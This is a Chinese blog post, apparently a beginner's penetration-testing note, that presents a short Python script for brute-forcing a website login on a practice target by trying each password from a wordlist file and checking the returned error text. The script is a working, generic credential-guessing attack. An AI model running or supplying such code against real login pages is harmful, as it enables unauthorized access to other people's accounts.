python编写字典爆破网站登录|思路

在做渗透时,因为太菜了,不会用网上的爆破工具,自己就即兴写了一个简单的字典爆破。新手小白可以借鉴思路,就当学习了。大佬请绕道!!
如果有好用的爆破工具,欢迎大佬推荐~


方便理解,我简单说一下背景:
渗透的是某靶机的网站,该靶机只用输入正确密码就能成功登录,在密码错误后在html中会返回如下字段:
在这里插入图片描述
所以我用爬虫把这个关键字段给爬出来了与正确密码作比较

import json
from pyquery import PyQuery
import requests
url="这里是url地址(这里为了防止恶意攻击,就不把地址放出来了)"
text="对不起,登录ID或密码(口令)错误"  #这里面的文本是爬虫爬出来的网页返回的值
real_password=0
time=0
e=open('pwd.txt',"r")
print("密码爆破开始!")
for login_password in e:
    data={'password':login_password}
    r = requests.post(url,data=data)
    doc=PyQuery(r.text)
    time+=1
    if doc("#tagContent0 p").text()!=text:   #这里拿爬出来的数据和文本作对比,相同则说明密码还是错的,不同说明密码就对了!
        real_password=login_password
        break
    print("密码错误,尝试爆破第{}次".format(time))
print("爆破结束!!")
print("爆破密码为:{}".format(real_password))
e.close()

因为没有把该靶,这个代码需要你们改改才能用
运行截图:
在这里插入图片描述

  • 3
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

向阳-Y.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值